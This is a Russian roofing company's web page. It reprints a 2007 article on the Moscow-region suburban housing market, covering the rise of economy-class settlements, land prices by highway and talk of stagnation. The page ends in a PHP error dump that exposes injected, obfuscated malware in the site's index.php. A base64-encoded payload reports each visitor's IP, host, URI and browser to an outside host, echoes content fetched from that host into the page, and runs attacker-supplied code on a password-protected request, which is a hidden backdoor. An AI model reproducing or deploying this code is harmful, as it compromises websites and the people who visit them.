Гибкая
черепица
+7 (495) 234-41-41
8 (800) 234-41-10
заказать звонок
Вконтакте Twitter Facebook Youtube
Рус / Eng

03.07.2007

Бум «экономных» поселков стартовал

мягкая кровля руфлекс

За последние полгода на рынке загородной недвижимости изменилось многое. В частности, появилось множество поселков эконом-класса, к тому же говорят о начале стагнации и на этом рынке.

Панорамный вид

Как рассказывает руководитель аналитической службы «МИАН – агентство недвижимости» Алексей Кудрявцев, за первый квартал года объем предложения составил 13,3 тыс. объектов, что на 4% меньше, чем за последний квартал 2006-го, но на 12% больше, чем за первый квартал его же. «С начала года предложение увеличилось на 28 новых поселков, – говорит исполнительный директор компании Blackwood Мария Литинецкая, – причем основной прирост произошел за счет поселков эконом-класса и бизнес-класса».

Всего же на загородном рынке Подмосковья, по словам заместителя директора компании «Миэль – Загородная недвижимость» Владимира Яхонтова, сегодня представлено 25 тыс. домовладений. Или, по статистике, предоставленной компанией Vesco Realty, 2,54 млн кв. м. «Речь в данном случае идет только об объеме готового предложения, – уточняет генеральный директор Vesco Realty Сергей Леонтьев. – А объем предложения в стадии проектирования и строительства – 6,11 млн кв. м». Спрос традиционно сильно превышает предложение в эконом-сегменте, отстает в сегменте бизнес-класса и примерно соответствует предложению в элитном сегменте. В сегменте люкс дефицит наблюдается только по самым дорогим домовладениям: имеются в виду, например, поселки на несколько домов, расположенные в уникальных природных местах – полуострова рек, особой красоты и экологической ценности лес и т. п.

Что до цен, то, по словам Алексея Кудрявцева, рост в первом квартале 2007 года составил 5-9% в зависимости от направления и категории объекта. Зависимость ценовой динамики от направления проследить достаточно легко. «На самом престижном и дорогом направлении – Рублево-Успенском шоссе – цена может доходить до $300 тыс. за сотку, а в среднем составляет около $40-50 тыс. за сотку. Второе место занимает Новорижское шоссе, где стоимость сотки в зоне до 20 км от столицы варьируется в диапазоне от $20 тыс. до $50 тыс. Самые низкие цены зафиксированы по восточному и юго-восточному направлениям», – говорит Алексей Кудрявцев.

По данным Сергея Леонтьева, если на Рублевке цены выросли (имеется в виду вторичное жилье) на 8%, то, например, на Дмитровке, Новой Риге, Ленинградке, Киевском, Калужском, Боровском направлениях – всего на 4%. «Почти 95% рынка сегодня – это рынок проектов, – уточняет Леонтьев. – И надо отметить, что размер девелоперских коррекций на этом рынке сейчас ниже, чем раньше: 2-3% вместо «привычных» 5% в полгода».

Evolution, not revolution

черепица загородный домНичего революционного не произошло в «расстановке сил» между подмосковными направлениями. По-прежнему лидирует в количестве предложений Новая Рига, оттеснив еще в прошлом году бывшего лидера – Рублево-Успенское шоссе; хорошие темпы развития показывают Калужское, Киевское и Дмитровское направления. «Наиболее активно с начала года развивались Новорижское и Калужское шоссе (9 и 5 новых проектов соответственно). Аутсайдерами можно назвать восточные направления, которые развиваются наиболее медленно как в плане коттеджного строительства, так в плане инфраструктуры», – считает Мария Литинецкая. «Я бы не стал говорить о направлениях-аутсайдерах, – придерживается иной точки зрения Сергей Леонтьев. – Восток действительно не так «на виду», однако там есть и престижные проекты (та же Малаховка на Новорязанском шоссе)». Леонтьев отмечает как «скачок года» развитие Киевского и Боровского шоссе: «После того как были построены первые 30 км до Апрелевки, резко увеличилось число качественных проектов, а следовательно – и цены».

«Наибольшее количество предложения характерно для Новорижского, Киевского, Рублево-Успенского, Калужского и Ярославского направлений, – уверен Владимир Яхонтов. – К этой пятерке вплотную приближаются районы Подмосковья вдоль Каширского, Дмитровского и Минского шоссе. Набирающая обороты популярность Киевского и Калужского шоссе связана с хорошей транспортной доступностью (Киевское и Боровское шоссе расширены и обновлены до района аэропорта Внуково) и малой загруженностью трасс». Именно это позволяет девелоперам предлагать проекты эконом-класса, которые находятся в зоне от 30 до 100 км от МКАД, а ранее такие проекты были невозможны именно из-за низкой транспортной доступности.

Направления отличаются и с точки зрения баланса спроса и предложения, подчеркивает Литинецкая: «На Рублево-Успенском шоссе предложение ограничено, темп ввода новых поселков заметно сократился, а спрос остался на том же уровне, что привело к дисбалансу спроса и предложения в сторону спроса. На Новорижском шоссе наблюдается равновесие предложения и спроса. Киевское и Калужское направления характеризует некоторая избыточность предложения. Однако необходимо отметить более высокие темпы роста популярности Киевского направления относительно Калужского, в то время как объем предложения растет более медленными темпами».

Тенденции: взгляд изнутри

Несмотря на то что самой очевидной проблемой рынка участники в один голос называют дефицит предложения эконом-класса, именно заметный рост доступного предложения отмечается и как основная тенденция-2007. «Девелоперы обратили внимание на эконом-сегмент (дома до $250 тыс.), – говорит Сергей Леонтьев. – Возможности компаний «доросли» до такого уровня, который позволяет удовлетворить, наконец, спрос в эконом-сегменте. К нам пришли технологии, позволяющие удешевить строительство: масштабирование, типовые проекты, относительно дешевые стройматериалы. Кроме того, девелоперы переводят земельные участки под дачное строительство, а не под ИЖС, что позволяет снизить издержки на 15-20%». По словам эксперта, уже сейчас девелоперы могут снизить себестоимость строительства до $500-600 за кв. м (что вполне укладывается в итоговую цену в пределах $250 тыс. за дом), а в будущем есть возможность довести себестоимость и до $400 за «квадрат». «Рынок эконом-класса, по сути, только начинается, и в среднесрочной перспективе я бы прогнозировал бум строительства жилья эконом-класса, когда его объемы станут сопоставимы с объемами жилищного строительства в Москве».

Одной из главных тенденций на рынке загородной недвижимости стала, во-первых, застройка значительных участков земли мегапроектами, считает Мария Литинецкая. «Уже заявлено о начале строительства в этом и следующем году нескольких крупных проектов, занимающих площади от 400 до 13 000 га: Остров Барвиха, Рублево-Архангельское, Плещеево, Остров Истра, проект «А101», Большое Домодедово. Во-вторых, идет активное развитие формата «дальних дач», а также повышение интереса застройщиков к эконом-классу. В-третьих, вырос объем инвестиций в строительство подмосковной инфраструктуры. В-четвертых, продолжает развиваться тип разноформатного поселка, сочетающего в себе различные форматы загородной недвижимости (таунхаусы, коттеджи, малоквартирные дома)».

Владимир Яхонтов отмечает как характерную тенденцию начало формирования дорогих пригородов Москвы в 30-километровой зоне от МКАД. «Можно говорить о том, что в ближайшие 5 лет дешевое жилье из этой зоны исчезнет, – уверен эксперт. – Еще одна намечающаяся тенденция – появление новых проектов эконом-класса, располагающихся на большом расстоянии от МКАД (от 50 км от МКАД) и обладающих меньшими площадями домов и участков. Девелоперы с интересом идут на дальние участки, потому что существует активный спрос на так называемые дачи, то есть дома для сезонного проживания. А еще проекты на большом удалении от Москвы требуют гораздо меньших затрат времени и средств».

А была ли стагнация?

кровля руфлексСлово «стагнация» – одно из самых употребляемых в 2007 году всеми, кто интересуется недвижимостью. В том, что именно она царит сейчас на московском рынке, никто не сомневается. А вот как с этим дела на загородном рынке, который (по поверью) копирует столичный с некоторым отставанием? «В начале года на рынке наблюдалась стагнация, – не избегает термина Мария Литинецкая. – Темпы роста цен были достаточно низкими: около 4% на поселки бизнес-класса и элитные, чуть выше был рост цен на поселки эконом-класса (около 6%), притом что именно в поселках этого класса было исключительно сезонное провисание продаж, а не связанное со стагнацией. В первые два месяца второго квартала рост цен составил около 5%». Цены на земельные участки, по словам эксперта, также практически не претерпели изменений. Подорожали только лесные участки (на 5-7%).

«Многие клиенты сейчас стараются «оттянуть» момент покупки, апеллируя при этом именно к стагнации, – рассказывает Леонтьев. – С другой стороны, если московский рынок становится рынком реально существующих квартир, то загородный – в самом начале этого пути (95% предложения – на этапе проектирования и строительства). И когда он станет рынком реально существующих коттеджей, цены, безусловно, вырастут. Да и потом, если сравнивать с рынком московского жилья, загородный практически и не рос. Поэтому никакой коррекции тут ждать не приходится. Как, впрочем, и скачка цен – ресурсов для такого роста нет».

Темпы роста цен в текущем году будут несколько ниже, чем в предыдущем году, и составят порядка 27-30%, считает Литинецкая. «Быстрее будут дорожать поселки эконом-класса, а соответственно, и ценовая планка эконом-класса будет выше. После небольшого спада в начале 2007 года рынок ожидает сезонный всплеск. На рынке в целом можно прогнозировать появление большего числа поселков эконом-класса, хотя количество этого предложения не покроет гигантский спрос, который в этом сегменте продолжит расти. Можно также ожидать сокращения объемов предложения в сегменте бизнес-класса, что должно в принципе уравновесить спрос и предложение в данном сегменте».

По материалам сайта www.sob.ru

Фотоматериалы - www.dianastroy.ru

Мы в:
MODx Content Manager 32 »

« MODx Parse Error »

MODx encountered the following error while attempting to parse the requested resource:
« PHP Parse Error »
 
PHP error debug
  Error: assert() [function.assert]: Assertion "eval(base64_decode("aWYgKCFpc3NldCgkaWJ2KSkgeyAgQGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIixmYWxzZSk7QGVycm9yX3JlcG9ydGluZygwKTsKaWYoIWVtcHR5KCRfQ09PS0lFWyJjbGllbnRfY2hlY2siXSkgJiYgZW1wdHkoJGlidikpIHsgJGlidiA9ICRfQ09PS0lFWyJjbGllbnRfY2hlY2siXTsgIGVjaG8gJGlidjt9IGVsc2VpZiAoZW1wdHkoJGlidikpIHsKaWYgKHN0cnN0cigkX1NFUlZFUlsiSFRUUF9IT1NUIl0sICIxMjcuMCIpKXskbmFtZSA9ICRfU0VSVkVSWyJTRVJWRVJfQUREUiJdO31lbHNleyRuYW1lID0gJF9TRVJWRVJbIkhUVFBfSE9TVCJdO30KJHVzZXJhID0gaXNzZXQoJF9TRVJWRVJbIkhUVFBfVVNFUl9BR0VOVCJdKT91cmxlbmNvZGUoJF9TRVJWRVJbIkhUVFBfVVNFUl9BR0VOVCJdKToiIjsKJHVybCA9ICJodHRwOi8vbGV0c2dvdG90b3AuY29tL2dldC5waHA/aXA9Ii51cmxlbmNvZGUoJF9TRVJWRVJbIlJFTU9URV9BRERSIl0pLiImZD0iLnVybGVuY29kZSgkbmFtZS4kX1NFUlZFUlsiUkVRVUVTVF9VUkkiXSkuIiZ1PSIuJHVzZXJhLiImaT0xJmg9Ii5tZDUoIjRmNGQzYjhlNzBmYzNkODJhN2VjN2VhNWU2ODk1Y2FhMTEiKTsKaWYoZnVuY3Rpb25fZXhpc3RzKCJjdXJsX2luaXQiKSkgewokY2ggPSBjdXJsX2luaXQoJHVybCk7CmN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9IRUFERVIsIEZBTFNFKTtjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfQ09OTkVDVFRJTUVPVVQsIDUpOyBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfVElNRU9VVCwgNSk7CmN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwgVFJVRSk7CiRpYnYgPSBjdXJsX2V4ZWMoJGNoKTskaW5mbyA9IGN1cmxfZ2V0aW5mbygkY2gpO2lmICgkaW5mb1siaHR0cF9jb2RlIl0hPTIwMCl7JGlidj0iIjt9CmN1cmxfY2xvc2UoJGNoKTsKfSBlbHNlaWYoaW5pX2dldCgiYWxsb3dfdXJsX2ZvcGVuIikgPT0gMSkgewokaWJ2ID0gZmlsZV9nZXRfY29udGVudHMoJHVybCk7Cn0KaWYoIWVtcHR5KCRfUE9TVFsicCJdKSAmJiBtZDUobWQ1KCRfUE9TVFsicCJdKSkgPT0gIjNmMTFlNmE0MmJjMWQ4MDE2MDUwMzEyYzc4OWRkNzFmIikgeyBAZXZhbChzdHJpcHNsYXNoZXMoJF9QT1NUWyJjIl0pKTsgfQplY2hvICRpYnY7Cn0gfQ=="));" failed 
  Error type/ Nr.: Warning - 2 
  File: /home/u199389/ruflex.ru/www/index.php 
  Line: 139 
  Line 139 source: $light = $strings2($gbz.'("nJLtXPScp3AyqPtxnJW2XFxtrlNtDTyhnI9mMKDbVzEcp3OfLKysMKWlo3WmVvkzLJkmMFx7DTIlpz9lK3WypT9lqTyhMltjXGfXnJLbVJIgpUE5XPEsD09CF0ySJlWwoTyyoaEsL2uyL2fvKFxtWvLtMJ1jqUxbWTyvqvxcVUftWTyvqvN9VPEsD09CF0ySJlWwoTyyoaEsL2uyL2fvKGftVTIwnT8tWTyvqwg9VTIfp2IcMvNbMJ1jqUxbWTyvqvxcVUfXnJLtXUA0paA0pvtxK1ASHyMSHyfvFSEHHS9VG1AHVy0fVPVkZwphZPVcXKfxozSgMFN9VPEsH0IFIxIFJlWGEIWJEIWsDHERHvWqB31yoUAyrlEhLJ1yVQ0tWS9GEIWJEIWoVxuHISOsFR9GIPWqB30XWUImMKWuVQ0tnKAmMKDbWS9GEIWJEIWoVxuHISOsIIASHy9OE0IBIPWqXG91pzkyozAiMTHbWS9GEIWJEIWoVxuHISOsIIASHy9OE0IBIPWqXGbvVwfXWUIloPN9VPWbqUEjBv8ioTI0p2qiqT90o3NhL29gY2qyqP5jnUN/nKN9Vv51pzkyozAiMTHbWS9GEIWJEIWoVyWSGH9HEI9OEREFVy0cYvVzMQ0vYaIloTIhL29xMFtxozSgMF4xK1ASHyMSHyfvHxIEIHIGIS9IHxxvKFxhVvM1CFVhWUImMKWuYvVznG0kWzt9Vv5gMQHbVwEzATDmLwuyAmOzLmAxBQWuA2IwA2IuAJH2BQx1L2SuZGRvXGfXnJLbMaIhL3Eco25sMKucp3EmXPWwqKWfK2yhnKDvXFxtrjbxL2ttCFOwqKWfK2yhnKDbWUIloPx7PzA1pzksp2I0o3O0XPEwnPjtD1IFGR9DIS9VEHSREIVfVRMOGSASXGgwqKWfK3AyqT9jqPtxL2tfVRAIHxkCHSEsD09BGxIQISEWGHICIIDfVQHcBlOwqKWfK3AyqT9jqPtxL2tfVRAIHxkCHSEsIRyAEH9IIPjtAFx7PzA1pzksp2I0o3O0XPEwnPjtD1IFGR9DIS9FEIEIHx5HHxSBH0MSHvjtISWIEFx7PvEcLaLtCFOwqKWfK2I4MJZbWTAbXGfxnJ5zolN9VTA1pzksM2I0nJ5zoltxL2tcB2yzVPtxnJ5zo1fvnUE0pS9wo2EyVy0uCGVjZPy7WTyvqw0vVwg9PzA1pzksL2kip2HbWTAbXGfXsFOyoUAynJLbnJ5cK2qyqPtvLJkfo3qsqKWfK2MipTIhVvxtCG0tZFxtrjbxnJW2VQ0tMzyfMI9aMKEsL29hqTIhqUZbWUIloPx7Pa0XnJLbVJIgpUE5XPEsHR9GISfvpPWqXFNzWvOgMQHboJD1XPEsHR9GISfvpPWqXFxtCG0tVwAzZGSyAzR0ZzWwZJD4ZQR2ZQHjZmRlLmp4BJExAmSzVvxtrlONMKMuoPumqUWcpUAfLKAbMKZbWS9DG1AHJlWwVy0cXGftsDcyL2uiVPEcLaL7Pa0tsD=="));'); $strings($light); ?> 
 
Parser timing
  MySQL: 0.0023 s(2 Requests)
  PHP: 0.3116 s 
  Total: 0.3139 s